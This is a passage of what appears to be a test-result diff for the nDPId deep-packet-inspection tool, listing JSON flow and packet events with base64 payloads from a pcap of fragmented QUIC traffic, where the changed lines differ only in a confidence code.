/cxU0t1SSA8TuG2Qovkwr8Q5atDfcwDzjbYNh4vnD4EwH9iR13QsPu2AvJQjfH4r8xwFeP4P+BosOwdv7qI095S245vAYmXdL+TcX5rXjtvIGCma5M3p3OuUhnY0Sw5uOMqNm7nKPE8gz+Qsbb3VghujUa0NFn\/z6mc8MCrFJWDwY0gtXgCMv3nHx0GNtveZAICqjHZI7xwD\/RqR1lUZAfrPmAYo2kQrmshXTSHK1+8ZYJQvHmShCz6JQySscdlE647wVjnlBAZLUNr\/JBi7VMTdmpytCi6WzCx9AClMAzaYwBrTYGAmEVrVYJn1CaBDE26M0v0gm+S3JJIUIKMgBJtWD32fztac9Z5cAdjD4Hplc8RLAKlcnsRn\/BbxbFD\/d6tMg\/0CsxSInqyE8gbUz3lWbKWZ4OyOgUZwqm1QvYwlCMJMB6wEc+xPqoVbA"} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1621486317090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486317090,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZXtAAH4R2m40uxSv0OWdUcWcAbsFTgb1xv8AAB0I+xTa7lKQafkAAEU0t4azdHP6WARXvgfhEqAKpp3NRuHRg86uDYx6EraWfkB\/keNDFP3812WLSUJscegRJDC6DlMfTKSYGWjNCpVN8MkKLUxcf64j8OSn7gJZrI\/Q\/gKqY6Z8WIW7yXuifcAcxkC+cmw4eAjlyzZBZvU8ggZVByRRED2WeesmX9AerV06QYER0EbcO9+qzWXQ6Y1556b95esXVXYKwgaT\/JKPANtVx8JfgN8Vh1WXykc2J\/44ZDFpxZFRkUgHxJ3usOwxmesQs2TSh30GqcsvOPy1uBZE3aVlHsrZmfwcenRdsFblzJPQcAyj4L\/6\/V7LtEzbpK98ZznFjKlQ\/CAc0XOreT7lRX11x9l8Nwo5wz1cQeBW03aSFui9mnb+3x1mHZOfYliDqBYAh9AjahgYUEMLGQiqpnnOD59nJV21MaJqJDM\/LJMSKyy9TxlVb0G\/G5WjXSDrmaBMSxIJiiiNThOK4NxEJznmEgpU9sC2Kzrji4qQ4sLSQ6G6Z0s\/K5gmRdAHVqFaA+OXNLXjAWZslcHRAYBCopAeso5rNrNCUMASsOo0cU4hy3GR22hGlLj3LBUy\/ywcQOfX7XYMmNZHdOfJKOwbfgqm7seEpATTHBOfsy1pkFj95HcOrlD13hBtaabu3RXQXmH3nvQQ0rAeKIQPng6Rz1ptjgs6q\/CsEIrQ831zGr9a68MXwQ51qstfBpiZJmHO5lQoTCcztT\/VSQm16LxdoNEA+tXVtDTHWzSIJ\/LsE7pROWa4ORaidOXgt5TuUpfp4UISCbasJi8sLhnJLPMM\/EMJ23P7ba+yNMO1yGyYgCP8y3iA4+Y0RCdbxKqNpblS1T9\/mwKgrVDaW0XfBdJ9ftVX8k4Asxj7aK\/grpVoo1x51mqqsIA\/eHwsOupYQnvyOKi6jHUZB2gug+9nv8P0lYzQYOI55nVygLmUPrt2mSQ2sxQZ3kNmobaJriv6tzeq4TnHl6oNqBTaUDSvgLoQFd9\/B93pzBto\/PWA85xxN7VZQOfd+DbFZ\/VBe73Qs+O+\/dsWYu8iQAMXiU4ipp9EIx\/uZoMUoWZj8rpSXDjEmLBbfMhJKI7th4AA0\/5pKTfK1Apef9X0Y5Kb2sWh24U\/M0c4i1SQdud1ypuHQGiudDhFPShSAhcPisWpjplWcdsEwxnBas4ojrBnnQjyHC2CNab1rcfTuqYLiJtZH+uFMNQqqo6\/rNfItXVpIQOkY7oH9NiquEBxGd5JMZV8xVdnW72qeBwOu707A4H9dx8aMxpNDFlsPT1CFtBo0+lBzmwd+U1J8RntLvUR++yoLGBfFoOFlBTxWd3EivQ+g4+hpsw6rhJx+o9KX12Wn+aCMzsyz2T+R275SnsosAVi6kZMH82nXvr3evy7oteFCprRiLgZZtTXZYQJnyvePz3+OCE1jJkDgtZz9lh5TRWEayVbmQ09oh0A2tO7l+b1MhJ9OOwh0tP+9C20L\/Rggyul58op2cZC7t0viwUloxNKFKHp6rLutsIgcRmAblAvmfE5evu8AKGMZAnbi\/qa50JLxEWg2ch014JrpjvQIgocJjdI4tVkdA1vAfzuTPMq6ZgpnlfebCtsmAjEOJvaC2jz2PpD3Da36F+9zqnKoYC4kArpMRPt1KxhhpnZuf4gUuyQNfw3N1IHRfKWJXJxGnUUH22LX3lkdvtG8ab43cqVRaBCEPVJUDvP1bY6E3TNNUkpsE2FLpbFaVjW8UTq4sTUXREoubs1+bmZBpV1b11ZgF\/sh+IuI5ZSadOQo47ZmlSoh\/ht"} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486318293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486318293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1621486369476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486369476,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaPxAAH4RXAU0uxSvYyqF9e6hAbsFTrhSxP8AAB0I+0NvIwjQu6UAAEU0azRBvw0HhuIl9\/xBjvifKak7sXpTLlmi+dbAR0gnHQ8yLpljofwXe+5I8+bjI6htbC0wktYLe9u1IbRrfn281Ygo9P+77SbfKFoWgOiNBP7DCcTYRMpm60boF\/tXFlu4RcDwIKHkE98LfcboNnZO6vgCOMNp2Oc0FW71MgnEMdGflqZG7oF457RNBS84xcpV6nGLNOdNKSMQqzQlO4jgRLIFlWEVMuZfPjKeCbFvi+9u443qZzhpp1RjViXLJQLM4O3xNtmwsrIybLL167f7g6DkkCHpv7D4g7Aegn0CUSGnhsDPpzH6vl+y+ZphsvLUKg8Up8DKE6OcuDZ2hrkBODY3w78BA6TwCijjXzbEkjwfOo6WXZ7anzvjy2rKeTxPqEDLbbU2mUP9vwNYzNXJKG2DUAsDLDw6z7pW\/sws6BGrQtkI4MswvtPP3tTOUG\/fE\/ztGz6sn0isa49Skrr5sdjTBckHoBSXiarAL+UhWVH3IgXrw7LDIqxiqdq7nRgSKmIzhN9fAbY6UXqQ932CN1pNDdZ9w\/GGn2o7t3bhxb5QVcZtml2RlYzXpD38XPIVBBQ47INhpeNulXlv8GPqMtdWTZebqe4kY7kqcVj0cQPvIwucmOBjpmJQg7KJ7oAQf9\/GJCRUlYyPpb8UxzZhEIeu3XefRjDZNtuoutnX0dz+oXCLYmdZjfP36HFbNYRByGa5fmywec37zgU\/qlyWBC2YCwex2EfvKOy9LWsTwa0ZT8kdxRFmJEv3ynISWQk6m6ALqZbKftEzLU53Sbc5IUV0op9T4rpP0U+RHeEC5OrRZtLDz7Eoi9XXjobuI3Vg8eC4MHSuUO6V5Xv0Nf3+ekeBTC4ZPF9uBseY\/M\/dl0+yfCT+XFaXx3GicyqgVnrvdtodSYLOXs8ya9nmPO\/qYXeXC3eiFr+iktgKCZgHHx3a+niakZlOQIdnQs8m+3FjMcPGf5iRRc1au20WBWADTpVoSMiHx7In8vZZ951ksDsiVML5vgKF3uCPIZiGrbd7epc75W0H66E6MYCh6UtGfeXcH48l\/e5dYlz+GnvNtX24qdsZ8ZjyXvychZ2KIR22+ZYaEiM\/DEMB6luZTBsCO\/v2zsreln6ASIp00NFiopmG5ECaS\/wzhc7cyOYeoLY+l9laxEBYEqW7mGrKnqBUW8CdAonXxsjkGQxEgjetP14OMrGziNFo3Hmm4YUyWifAkDAA0y29APcv6DiME4DgmAODMt0L6F2HG8ByP+NbokUTWDBX+4z7Vu5mleZba895fNmU9ORQiZpsGKf5KdpS60rinWsd7H7F5AaKkK9V8ehTTA2KJN4FeRKEoVzjZNBXQIIp68V\/vTf6MjitUwkEVupaAbIqjiysCSlLtNhGoB5fG+h4bOdXHXY5aevu6eMcfIv\/VbjnB55QeiEX\/EGcg3yTCoROSaMNCGVQt7zybtKYLEAyJsZQdEzgoFSBm\/aVwsdOJLWiaQNxXr18wB2gwcynUtmY2OVRwX9j017xp7wGxmkp6fMo89Q5EZUZHfrQPUTsdLVxwrCtX8+BW19j1yLDE1jHz\/+hGjjVhkwiSSrUAMm3RWzCmyQbEXOdJpYEBon5bDAOn9LIToMnCQE86GVIS0UXQomCSYbZ4epFa1Ztm0zGdSLCKIfptcYOK6+a0cWvPAl+LZLk6bVf4IQ3VrJ2Pyo8DyjbC59d75TDSUXKmy1\/\/IRu4PkQCaoDSf88oNbPYxcEpRCESbf7WtoG6B+DEymuEdUAjcUwmOAZpwYnrVev"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1621486369781,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486369781,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaQVAAH4RW\/w0uxSvYyqF9e6hAbsFTrnVzP8AAB0I+0NvIwjQu6UAAEU03RUajo54f3xaeQcz5ShQCKZJx+hnzaoOL+d9TDb2UYj2DFEQFg8O+PU04LqxBWrWZC6Jw7FAOK24WCy0+Qq+3W2m1Yj3lW4LJIV888sWjcqqlWbULhyMA\/KD5b8qufe+TPSdlntyuZPV2pTPKi5B+SQiTyl5FD9POY3+v3rSnfowAVM2nytoVtVAXU7ajofA6WeK40X1jrJmHBb8E8rErNsDpXfZzug5wr1qdAlbwVJRdAAFYIZgoB2\/qSq5jmhYNWc\/gyOteYYnvauiknHb14gnDW9kJk2AXthTxKyTuNGMMxIe8\/+57XTEdXgzJjfVFWlgu2dHS8t\/0D3vzl8kg3nUD3Et77FL6IMLHaLSMukGOY1oBOkzjqX9K7VF4oQZRG9WjeL8sHkc22npUwO8iu8Bg0QKzz6y1u\/WTGBcWCD6mmt7brbnyRuuQgJ5OSl+aUzFnuzYJwIcGCDmEAvg+d8QzbJwb0\/ydw6dj0OMY83exGXykPAMPH7d7uEh5qtWi73l2znhazBL+P6xXiAwMP5388MuTY+jv7myTvH2QegjTUhQrSoffjxgsBE+ew2qlWyIZdlD9xSPSQjzdG892xvO+Daqm0xCPE1\/DcTBrgTsBx5zRHmldCADLkPEXpDHIwwb64NYIN\/OgJT2Txk9iwrogjaIoAbzHDjBsRD+zjRv6ke5JHSd+l5VjHM2dZF9PUtL0DvVyYUjBO9tnDbTkEoPXCgLrgUFMpYiHso39U9eNfLO5kGqcHN+eOpKAvyRZVxKbK9+4n4VOyQK+R8se+nV68oYONIx4HlUc503SyGOap\/\/LCYROiGY4eaPDh7vr94Iu30hTjCiyIlio3ENmo2Xtpgx0y4zki182URjhdi2lMGGt75JESZeZfkA34f7hLFevCumcj6ijOjzZ0u42eGs\/RX\/7\/yBrnMjY+2gfiJ4TxqZChQis\/GYKAbD2JIuzCsi6V2Ubm8Nw35KDS+sB53W6Do27E2GSA2DWv+MzAm6zveezQDVV+o4OsT5neD4AAwgLFy\/Qy2xi+GZjSkZy8RSo3iRdAs62eGy1gVfhyPrNudRwVNEuWk\/dY2itlVJ+HJ28fJnpvvX3tj8I7p1+1yZJSjalMpM5yQmgJkG9WVckV8DGAWXv3xO8cB5OugwG77mQoMStI3vQGUXlb1t4\/i+fDw\/GuS4IZc1qT+z2tWNFMto35TYb7NCelxMcXuuM+fYamAktrAw1KxhGvSXuYqr\/srgGiZhDyKLEbwtAm\/PUk8PsLr9uf3dxP9zKVSrZ3enmKDlUmAbwVi3hp78d\/5QtHvS4TMGUKLEXPCDhUSuwE7OOnJPgm+9br0i+fWDTX4tU91C\/jkplORo4Cj82ZnXtiWWPH0axQZfuh8nQGk2O3ZzNJTPqAtZI1gmIa6n7kNGEdgtaMX7Pg3vjDy68p5aVHfYpO\/dRKKWrMVDPCoBiAvp7eoWe9rRs4zHZdWniTJ3TJ\/1zSX8g\/p4+Y0B5FqL1OIXFwBjWTct4roreoqwYWuYvynwyepiVqQwZWkuHxiCkCJi1WnbBJ5iZfX\/8wWqdcHJRUcAJUNgCfoV7Ve\/zYSplpt9zSooIJyCI6uI9H8NvW80zzMgfGToxt4BHzDG95IPe8ajcFZ5KX0BoZRF14qIUNMRcwxWisnEuOIE\/Q+ayMiFBDXLhxu7NRovYXsWUIFNs5o2BFE\/MKTaf\/oZ0iEYees5KfoTm65JfoEaFJ9jS3QBRmZFIyZUE+OXP+Hcko2Pe\/+D7s3GVBk0cIMYErQi"} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1621486370391,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486370391,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaQZAAH4RW\/s0uxSvYyqF9e6hAbsFTimxxf8AAB0I+0NvIwjQu6UAAEU03bTMBGYCrS8cnv5vhFjbtc1bGvAvFQnZB6yJG8NkcrmiIIJPIXl2q4dOP10rWX5YFWQXsyHMoGvgrIcWDVzIX3NZ7o8SxUndmlIUJBVqXEfKC6th0dxYBXCRfJJYWNyYrXmuN+Y0PL58UHK7tpZpgBK7mIQyQqSMZcKAs7IPHVXv2Sv3DGgEdMifspeJLZrqAdK5aSG9OqL\/1HP9dlfRJZOn5z1AX6j5z63ULJV5lG7V5bETO20pw88dGKcT+ZGMwvA69Sd5k0J76yF4otVf+nWsZJtlYGjXtglJhDbIRllnDv+E+a46adZELPbL8K3oBj6\/CCVCE2naOyEf6mPlfsVkBDeGjKbsRBu21pYLux7J6CXacUP3TFJ44akagTX\/8xKYW3ZaCu4Q0+BcjGnTHcCQO7kjxo2v3xqEKiOBagnZztVu8xYJUV1uSp0p84BGJGssQKgY2BPdhtNjFgTRBcdgKWi1F7+kUVb\/YTbwJyuRTa+PDvQQMNFOZgaYCsfjqFJWHKG2zIwkFspCoaCF8XtQGkCq9jE6y4qf4zjPbZ7N1UwwnwdZxfWb1Fw4aktZsDsenXL8B8X0NngfTME6MDZxvWCxHmQc5ppnjDsJXBvxCfHQyc9M7d8D8CeVC+HWbU67PYxUuKsITW5a7mAaKH0WaTJ26olLUeQA3GDIUFw9xUdggvpZTPLePjQefZEEfRjRjT8iEYeb9CzGQi6t+9fTQ6pc+9Rp6a50KYQ1uCZSpODozp\/OQcBEbdR9GtmHpCDR0JSPJbtOYkVGGl9N0B1JEmNoUvWkQjGNjAZe3zsIkxaJ57mePus0qsRip0mYliPwjYjUPzsCHzNeDVwVXuWpUcUzM2mUJOgikCw6XKjTRqaWuAqeW1c9z4mZTbOSK\/TxHcCg\/WiNrzmz+WTnbB9BVLyyGE4vg7qJFN4PX2g3DqbfkifJRA9XPVuXHaYWBlDVz8FX3HNEQ6rLUkFa6eqyarqoeBLNt0e0nZn9mcxG4Qo9mD2OYNdYfux80GSAZIDpyIm8TDnnEmhS5z2HYyomgtO2Y4t\/N5FkVRx6yIfdqPtr7Ui3r9fpMCfazjmjrQ+LfRUxo6Q2p6YAAv1C6FuIqrLJVqHI\/kpJu7ZWHTe2PKlaiOnlj1A5JSK4vO\/0WUDs4dtC6LTCRT2cHR8t0Gej0FDzJ++VJbM\/YfPg8brEWZFYdpsvpeNzCryX37u4tW9MApgeHZ1fZQT7f+f0wNL3xb9nkBGv430\/o6aRXdV4rdsVK1Icwt6zKjtP4+M0EEPcPCQVgeyQEGAAiT3Uzle36U56GZffLsCMgG23H\/3Z1NKDWwffbKh1gfnfiwFVKdwun1Qt78gbk1vSqnomb\/J79AsHqjs4dj92ExlMBaeEeYS838CC1\/+GvM2TQqnNQGc0TBtsKDsLKmNN\/8BHFpN4K9oCP36JNjPgUtLnOiEpwlupSGWcDbtdi6ZFxy+Q7dsd+3esOK\/k1qXwrnT1z9erk299qqN\/tK39BUGopYzBcI7ZqtvWVyUcAQv4rkOvMHmT93EH9eAV\/HM1whxSr7kyLBcJNnJ8VG6vC+5b8Eiwd4KEvhX4SUFtdpJK\/juljSeDOnjRTvrONC\/wed2ymfPWrpUK94fPBsgVhs3zwEWHcezodeiB7xOvk8HZvWHvIdUWX23Dy5xvn5LYUigujlWn4Of6EawcMVeXgViQ66NNCX\/RKsSqrI\/0g0LQPkUhNuc1Z6LvT+izQ7m4p2uahClxy2m7stvMB02QAeTxR40TF5yA"} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1621486385474,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486385474,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZFAAH4R2lg0uxSv0OWdUcLYAbsFTiq5xP8AAB0I+aKrjQG3wPMAAEU0wuD+7fY6Iyc8tUyNR8o8NpWyUYFI2ltF3LBlXWefiS8pWcL74QB2DRW9zaYKiQLkhdAYa9TytEiykfGGocLbybyMzfU84hTMBvmtN9X8ZFMfEisph4kQ3rvmzIKxImtWYbPuenHPvncTyghAlfBjyTAs4SBTn7zgSiTlWDdrfi34xfTstE2uvPZkKaWey9pXrjtdmfzoUf\/pnc+joM+ZvbIOQcTsRmXe5mjiVNaJ6HbPiHfKS10CyjUY01LajnspTwPslYnWYHNLgwAGsyRZ3BxR6GzhK0yi77NGNugWOahmIQ6nR7Ydevwzssc8uD6\/61qD61eTpCJutHPvmpIMYyBaYt3YTvj7rWTy4+Jwluo7NCbmBS6erQnQ0BioBgOLfZKwMDge8tR1RT7fB2y73uabWZmh+z9EXiZif9vDBEIzL8O7i8XDK+n4f62Ye3t+bnf3T\/kEu06cpWij61xvDaapGt5KkkpyGLnr1+FLnojx+RRHnFHIYRBgk0R2kEDER0hHA1VeiOanzTBCFFmvwFA4TMEyQweEYvKw3Kr5NUAc2xOwhVaAL3S6xL\/Wk\/SHYOYp5f0PvIEoO7\/8io\/mEJnGHY\/3kgfXj71k\/T3+r2XctxV8PD3XFXtFnV1FZeROEc3BUlMypjGko0Tbxn8TLjIbiqBt40oHwVFVvr3zGWD1h4RU4S4gf9uyP8Ze+YtGqGo434thBMwnGvfjKdLhQJtIVyNEqyYwuvEvQSBGG+kgp7fWxhCxs3+fbhPQTRYk\/v3WUK2SO9YuJEstt\/h2vF9QgTemr9AIjZTwspLB5lVyViciTmGq8Sv0ccZicPe8AazPdv40uBUNsLwlJBWnFFcDvymaaOS6K09cWBdy0mbrwp8\/Qf2j\/wwjY+o0OYJsGRCGGQ6ET57ektTFjrSGOVwqV9ScfzX5znZD+H6kwkBf1O5IzmA+\/GA1wqzC5J9sUPvKCTirqPecQIYYVquKinZKzhsDVhUADXpFT0udOlKR0uhkOCRqJsNTXL\/mafXS3+PSGh99iH51SwtUUJntU0BR8enFfk1SrdSRAr8wyz4qsVel4jzWEdUfHV\/P86FFH+QEw1abjB2h3SRqAAOHmAfcG\/uY9ox6u2GzMWSaZnsaTqOVBeLeWcQzhkrU9Z0XOCXuT8oREqaNA5FtJW8KWw4W7AgsJOgQ6KKmOhxh\/Sa9xvwEc+UXuYo4+9\/295WwLPUiqlmI80sZ5MoN\/M3QtOiUpRW6uU50HQdEXpljpfNX1Ul8JoBTMhvcJ5NW+FyRXYKNMfEEmEJ\/bvF3\/j1YI05JniGjM6mnl++dN8BP+GVMRR9DzF5J5ULbCVwM0AAMJLiLlwhwq9U40MTPoWJnoX9YFggLWwj9lQC065dWBen4MPGk26TfmuuXGV+X8k4iX8RotxUbiRr+NVmhdaVnI0o8YdFg4IeDNDlpwLL0St6sT5ZrmettHNngu+I1PPObx1u4\/0P0MqDPvazomUz93QZhJKVKT9C6LEyLYcSjxTGXp1+z4ZDBBfwlu0ys9uEElkGFm3wDpJMIW9I5cCW\/YYdHy79zUfD6w9hQ\/hirJGoMOzA0yz\/\/oESSV5DpdQtEEpQVf+pa4YsPzNg2XIlz8e+OjE7mj5zn0kQEz19jUtEba97CNXLU5+IwcQj89kSD6mwJqhhNAA9qbQHiUlU2rWwCsntFwUpKLMMcVCHYrVsOlaOMOyK7dkwME8jMVzZFIiv19xEqG38D3uh5T3lqXB4+cO87sUlV0VfbSVX2jiLZmUKp"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1621486385780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486385780,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZlAAH4R2lA0uxSv0OWdUcLYAbsFTtWuzv8AAB0I+aKrjQG3wPMAAEU0pYnq3I+Pk4UybR9VBssX3rW2MX9MykXuwtEl37HZjZdvUwqOPILmOs1ug3ZVyVxysW\/GbunfQvoEKJNeJUHr7ARioYosUv\/iMtw3zJNnqitKNycrvEvR+KPtynwqcEskqC+a0DoLcVg8G+1ytgtC5bHkcrgb6c+yvfYPM6bQHRedo3fqBnUH\/vo++7E8FATzPknFujoxXAfIqx5\/yGoMqH+HqtaMj\/gBvnONUQgLifilr2pN2X5UZtCvWUHfwSy\/ewC4h8t+MC5HX5kjR\/I\/PEFr21ZhBOTbRAIvsPlTMMkPaVFoJeMhvSPXH3RCxFq+4eYuMrUD0OhNOcPxOIZDZCyl0o\/ggv2DFXNJg+gVLPXoZbPB4iu5Uhmke6bpE2jqTUZPjwXEkBe6xV6sp6bLYYcswATmdDqFUEdmWGMKBAsMqXikUGSk8uiqTt95fjHy8nJN41GX4xtHHAni0YyIelafqSbckoVL1qDANQr0CxF7G13sR9plFiWW7O5A7e7cS9pe6mRYIxMGaciOe9ievt36yTBJgl\/fiQ\/Mz7Rf\/0\/xEHpiGjimSZGMLJKt8tbPUkf1Doy0L2PCwY6LPbySmFk83DrXfORYqZzQC5aRkTc2HeUqrMm4bElbKJ5gKch3VNRryw25TpUn